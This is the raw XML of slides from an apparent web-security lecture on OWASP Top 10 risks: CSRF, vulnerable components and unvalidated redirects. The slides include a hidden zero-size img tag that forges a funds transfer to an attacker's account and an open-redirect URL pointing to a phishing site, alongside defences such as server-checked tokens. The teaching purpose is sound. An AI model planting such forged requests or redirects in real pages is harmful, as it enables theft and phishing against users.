              <a:gd name="adj1" fmla="val 14120"/>
              <a:gd name="adj2" fmla="val -84274"/>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The same check needs to take place in the controller or else someone can go URL fishing.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4118284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request forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim</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34</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917964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request forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim</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35</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749272065"/>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37624145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request forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim</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36</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29643572"/>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Rounded Rectangular Callout 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1676400"/>
            <a:ext cx="4648200" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 67970"/>
              <a:gd name="adj2" fmla="val 3885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Any link or form that changes state on the server (usually a POST) can be vulnerable.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22111880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Cross-site request forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim</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37</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4224928347"/>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Common</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="FFB2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Rounded Rectangular Callout 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1676400"/>
            <a:ext cx="4648200" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 67970"/>
              <a:gd name="adj2" fmla="val 3885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Any link or form that changes state on the server (usually a POST) can be vulnerable.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="3352800"/>
            <a:ext cx="6172200" cy="11430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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>https://bank.com/app/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>transferFunds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>amount=1500&amp;destinationAccount=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>attackersAcct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>#"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>width</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"0" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>height</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"0" /&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rounded Rectangular Callout 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="4495800"/>
            <a:ext cx="6553200" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42646"/>
              <a:gd name="adj2" fmla="val -73373"/>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This can be put on any site an attacker controls.  Since the cookie is also sent, the user may be authorized.  Require </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unguessable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> tokens checked at the server side to stop.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34233982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Using components with known vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Components, such as libraries, frameworks, and other software modules, almost always run with full privileges. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications using components with known vulnerabilities may undermine application defenses and enable a range of possible attacks and impacts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38</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31745352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Using components with known vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Components, such as libraries, frameworks, and other software modules, almost always run with full privileges. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications using components with known vulnerabilities may undermine application defenses and enable a range of possible attacks and impacts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39</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2420195282"/>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Widespread</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="FF0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Difficult</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="FFFF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194364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Lists of Very Bad Things</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>OWASP Top 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>– Open Web Application Security Project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>CWE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Common Weakness Enumeration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mitre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Corp.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>CWE/SANS Top 25 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most Dangerous Software Errors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>WASC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (Web Application Security Consortium) Threat Classification</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{16D7F6B3-FE9A-4A71-A476-BA18060D4072}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1405639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Using components with known vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Components, such as libraries, frameworks, and other software modules, almost always run with full privileges. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications using components with known vulnerabilities may undermine application defenses and enable a range of possible attacks and impacts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40</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931835984"/>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Widespread</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="FF00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Difficult</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="FFFF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Rounded Rectangular Callout 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1143000"/>
            <a:ext cx="4648200" cy="2895600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 67970"/>
              <a:gd name="adj2" fmla="val 3885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The PHP 5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>changelog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> references 81 CVEs that have been patched (or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>repatched</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) since 2007.  The whole stack consists of the OS, web server, database, application server, various frameworks or modules, and then custom code.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26544579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err="1" smtClean="0"/>
              <a:t>Unvalidated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> redirects and forwards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages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41</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25971949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err="1" smtClean="0"/>
              <a:t>Unvalidated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> redirects and forwards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages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42</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478130257"/>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Uncommon</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="FFFF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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2252122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err="1" smtClean="0"/>
              <a:t>Unvalidated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> redirects and forwards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{16D7F6B3-FE9A-4A71-A476-BA18060D4072}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>43</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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Table 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1089437690"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4724400" y="2819400"/>
          <a:ext cx="3185476" cy="2260600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstCol="1" bandRow="1">
                <a:effectLst>
                  <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
                    <a:prstClr val="black">
                      <a:alpha val="65000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1592738"/>
                <a:gridCol w="1592738"/>
              </a:tblGrid>
              <a:tr h="565150">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Exploitability</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Average</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="FFB200"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="565150">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Prevalence</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Uncommon</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="565150">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Detectability</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Easy</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="565150">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Impact</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Moderate</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="FFB200"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1149842" y="1752600"/>
            <a:ext cx="6172200" cy="4572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sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://somesite.com/redirect.php?site=phishing.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1149842" y="2373745"/>
            <a:ext cx="6172200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E6E6E6"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="133C5D"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="65000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
